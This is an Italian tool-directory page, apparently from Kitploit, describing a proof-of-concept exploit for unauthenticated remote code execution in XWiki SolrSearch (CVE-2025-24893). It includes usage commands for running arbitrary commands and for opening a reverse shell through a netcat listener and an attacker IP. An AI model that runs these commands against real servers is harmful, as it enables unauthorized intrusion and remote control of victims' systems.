Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xwiki_solrsearch-rce-exploit — PoC di RCE non autenticata per XWiki SolrSearch (CVE-2025-24893). Esecuzione di comandi + reverse shell. | Kitploit
Strumenti/GitHubGitHub/torjan0/xwiki_solrsearch-rce-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlApprendimento e FormazioneSviluppo Payload
GitHubtorjan0/xwiki_solrsearch-rce-exploit

xwiki_solrsearch-rce-exploit

PoC di RCE non autenticata per XWiki SolrSearch (CVE-2025-24893). Esecuzione di comandi + reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
18 mesi faNon ancora revisionato

solrsearch-rce-exploit

PoC RCE non autenticata per XWiki SolrSearch (CVE-2025-24893). Esecuzione comandi + reverse shell.

CVE-2025-24893 – PoC RCE per XWiki SolrSearch

Proof-of-concept per l'iniezione di template SolrSearch di XWiki che porta all'esecuzione remota di codice non autenticata.

Testato su XWiki Debian 15.10.8 (corretto in 15.10.11 / 16.4.1 / 16.5.0RC1).

⚠️ Solo uso educativo. Non eseguirlo contro sistemi di cui non sei proprietario o per cui non hai esplicito permesso di test.

Cosa fa

  • Invia payload Groovy appositamente costruiti attraverso /xwiki/bin/get/Main/SolrSearch.
  • Esegue comandi arbitrari e avvolge l'output in marcatori Base64 per una decodifica pulita.
  • Supporta l'avvio di una reverse shell tramite socket Java.

Requisiti

  • Python 3.x
  • Installa le dipendenze con:
root@kitploit:~
pip install requests

Utilizzo

Specifica l'host di destinazione (e il percorso opzionale) quando esegui lo script.

Esegui comandi di base:

root@kitploit:~
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"

Avvia una reverse shell:

root@kitploit:~
# On attacker box
nc -lvnp 4444

# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444

Note

  • Endpoint: /xwiki/bin/get/Main/SolrSearch?media=rss&text=...
  • L'output Base64 pulito garantisce un parsing affidabile.
  • Originariamente dimostrato durante HTB Editor, ma applicabile ad altre istanze vulnerabili.
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
Scarica lo strumento